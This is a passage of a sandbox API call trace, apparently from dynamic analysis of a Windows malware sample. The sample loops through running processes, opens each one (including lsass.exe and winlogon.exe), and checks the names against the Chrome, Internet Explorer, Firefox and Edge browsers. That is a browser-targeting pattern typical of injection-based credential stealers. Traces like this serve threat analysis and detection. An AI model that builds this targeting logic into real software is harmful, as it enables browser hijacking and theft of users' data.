	[0214.033] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x428c
	[0214.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.034] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.035] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.035] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4290
	[0214.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.037] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.037] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.038] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.038] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0214.039] CloseHandle (hObject=0x188) returned 1
	[0214.039] Sleep (dwMilliseconds=0x64) 
	[0214.143] GetCurrentProcessId () returned 0x110
	[0214.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0214.151] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0214.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0214.157] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0214.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4294
	[0214.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.190] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.190] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.191] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.191] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0214.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4298
	[0214.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.192] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.193] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.193] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.193] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0214.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x429c
	[0214.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.194] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0214.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.195] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.195] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0214.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.195] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.196] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0214.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x42a0
	[0214.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.196] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.197] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.197] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.197] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0214.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x42a4
	[0214.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.198] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0214.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.199] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.199] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0214.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.199] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.200] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0214.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x42a8
	[0214.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.200] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0214.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.201] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.201] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0214.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.202] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0214.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x42ac
	[0214.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.203] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0214.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.203] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.203] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0214.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.203] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0214.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x42b0
	[0214.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.205] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0214.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.205] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.205] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0214.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.206] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.206] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x42b4
	[0214.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.207] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.207] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.208] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.208] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x42b8
	[0214.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.209] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.209] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.210] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x42bc
	[0214.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.211] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.211] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.211] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.212] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.212] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x42c0
	[0214.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.213] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.213] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.214] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.214] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.214] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x42c4
	[0214.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.215] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.216] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.216] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.216] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.217] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x42c8
	[0214.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.218] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.218] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.218] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.219] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.219] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x42cc
	[0214.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.220] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.221] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.221] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.222] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.222] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0214.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x42d0
	[0214.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.223] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0214.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.223] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.223] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0214.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.224] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.224] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x42d4
	[0214.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.225] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.225] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.225] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.226] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.226] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0214.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x42d8
	[0214.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.227] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.227] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.227] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.228] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.228] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0214.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x42dc
	[0214.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.229] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0214.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.229] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.229] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0214.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.230] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.230] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x42e0
	[0214.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.231] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.231] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.231] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.232] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.232] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0214.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x42e4
	[0214.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.233] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0214.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.233] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.234] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0214.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.234] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.234] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0214.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x42e8
	[0214.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.235] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0214.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.236] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
